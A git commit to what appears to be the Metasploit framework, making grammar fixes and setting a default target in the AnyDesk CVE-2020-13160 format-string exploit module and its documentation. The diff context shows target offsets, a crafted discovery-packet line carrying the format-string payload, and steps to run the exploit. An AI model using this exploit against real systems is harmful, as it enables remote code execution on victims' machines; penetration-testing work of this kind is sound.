Fix some grammatical mistakes and set a default target for anydesk

2020-07-01 15:27:33 -04:00 · 2020-07-01 15:27:33 -04:00 · a27bf9df38
parent bb33bc9c62
commit a27bf9df38
2 changed files with 9 additions and 8 deletions
--- a/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md
+++ b/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md
@ -3,18 +3,17 @@
 This vulnerability affects Linux versions 5.5.2 and older. Old versions of AnyDesk can be downloaded from their site at
 https://download.anydesk.com/linux/. Use the `.deb` package for an Ubuntu installation.

-The check method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the the
-target to respond with it's own discovery frame. Each of these are sent from a random source port to the default AnyDesk
+The `check` method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the
+target to respond with its own discovery frame. Each of these are sent from a random source port to the default AnyDesk
 discovery service port of 50001. To configure the listening service in Metasploit, change the `SRVHOST` and `SRVPORT`
 options. The exploit will use this method to detect the remote hostname and confirm that the operating system is Linux
 before proceeding.

 ## Verification Steps
-Example steps in this format (is also in the PR):

 1. Install the application
 1. Start the AnyDesk GUI. A window will open, leave it running.
-1. Start msfconsole
+1. Start `msfconsole`
 1. Do: `use exploit/linux/misc/cve_2020_13160_anydesk`
 1. Set the module options
 1. Do: `exploit`
--- a/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
+++ b/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
@ -1,5 +1,7 @@
+##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
+##

 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
@ -14,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
        'Name' => 'AnyDesk GUI Format String Write',
        'Description' => %q{
          The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially
-          crafted discovery packet, an attacker can corrupt the front end process when it loads or refreshes. While the
+          crafted discovery packet, an attacker can corrupt the frontend process when it loads or refreshes. While the
          discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On
          successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.
        },
@ -26,8 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
        'References' =>
          [
            [ 'CVE', '2020-13160' ],
-            [ 'URL', 'https://devel0pment.de/?p=1881' ],
-
+            [ 'URL', 'https://devel0pment.de/?p=1881' ]
          ],
        'Payload' => {
          'Space' => 512,
@ -56,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
              { 'stkref1' => 93, 'stkref2' => 165, 'time@got.plt' => 0x119ddc0 - 135 }
            ]
          ],
+        'DefaultTarget' => 0,
        'DisclosureDate' => '2020-06-16'
      )
    )
@ -148,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
    udp_sock.put(build_discover_packet(hn, "#{bad_unicode}%#{target['time@got.plt']}x%#{target['stkref1']}$ln", 'ad', 'main'))
    print_status('Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...')

-    handler
+  ensure
    disconnect_udp
  end
 end